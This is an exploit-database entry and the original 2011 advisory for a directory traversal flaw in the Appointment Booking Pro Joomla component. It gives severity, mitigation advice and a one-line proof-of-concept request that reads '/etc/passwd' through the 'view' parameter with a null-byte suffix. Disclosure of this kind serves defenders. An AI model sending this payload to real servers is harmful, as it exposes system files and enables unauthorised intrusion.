Appointment Booking Pro

vendor:

Appointment Booking Pro - ABPro

by:

Don Tukulesto

5.5

CVSS

MEDIUM

Directory Traversal

CWE

Product Name: Appointment Booking Pro - ABPro

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: OS X 10.5.8

2011

The component allows directory traversal by not properly sanitizing user input in the 'view' parameter of the 'index.php' file. This allows an attacker to read arbitrary files from the system, such as the '/etc/passwd' file.

Mitigation:

Currently, no vendor patches or upgrades are available. It is recommended to restrict access to the affected component or implement input validation/sanitization to prevent directory traversal attacks.

Source

Exploit-DB raw data:

Appointment Booking Pro is a native Joomla component
=================================
Last login: Tue Jun  7 2010 10:20:22 on ttys000
                                 ______                                 ___
        ______               ___/  /  /                                /  /
       /  /  /___  ____  ___/__   /  /  ____  ____  _______  ____  ___/  /
   :  /  /  /    \/__  \/  /  /  /    \/    \/    \/  /    \/    \/     /
   | /  /  /  /  /     /  /  /  /  /  /  /  /  /__/  /  /__/  /  /  /  /
 --X-- /  /  /  /  /  /  /  /  /  /  /  /  /  /  /  /__   /   __/  /  /
   |\____/__/__/\____/\____/__/__/__/\____/__/  /__/  /  /\____/\____/
   :                   ____                        \____/:
                      /    \____  ____  ____  ____  ____ |
                     /  /  /    \/    \/    \/    \/   --X--
 Don Tukulesto      /     /  /__/  /__/  /  /  /__/  /__/| 
                   /  /  /  /  /  /  /   __/__   /__   / :
                  /__/__/\____/\____/\____/  /  /  /  /
                   www.indonesiancoder.com\____/\____/ 

Author		: Don Tukulesto (root@indonesiancoder.com)
Homepage	: http://indonesiancoder.com
Published	: July 17, 2011
Tested On	: OS X 10.5.8
=================================


=================================
|	Software Info		|
=================================
[>] Vendor      : http://www.appointmentbookingpro.com/
[>] Software    : Appointment Booking Pro - ABPro
	      Appointment Booking Pro is an appointment booking or scheduling, web site component.
[>] Cost        : $59

I. Proof of Concept
=================================
index.php?option=com_rsappt_pro2&view=../../../etc/passwd%0000

III. Vendor patch
=================================
Currently manufacturers do not provide patches or upgrades.


=================================

[>] INDONESIAN CODER ~ Server is Down ~ Malang Cyber Crew ~ Magelang Cyber ~ AntiSecurity ~ Exploit-ID
[>] M364TR0N ~ Gonzhack ~ ibl13Z ~ kaMtiEz ~ k4L0ng666 ~ vYc0D ~ Xr0b0t ~ N4ck0 ~ r3m1ck ~ Kidd ~ Jundab
[>] yur4kh4 ~ aN93l1c ~ Arianom ~ Pathloader ~ Contrex ~ Mboys ~ n4KuLa_ ~ m4ho666 ~ jos_ali_joe ~ mengau
[>] kecemplungkalen ~ YaDoY666 ~ Jack- ~ xshadow ~ s4va ~ NoGe ~ kido ~ t3ll0 ~ cimpli ~ Xadal ~ Cyb3r_Tr0n

We are the watchmen, the hackers who quietly observe the scene.
bit.ly/OpIDC

=================================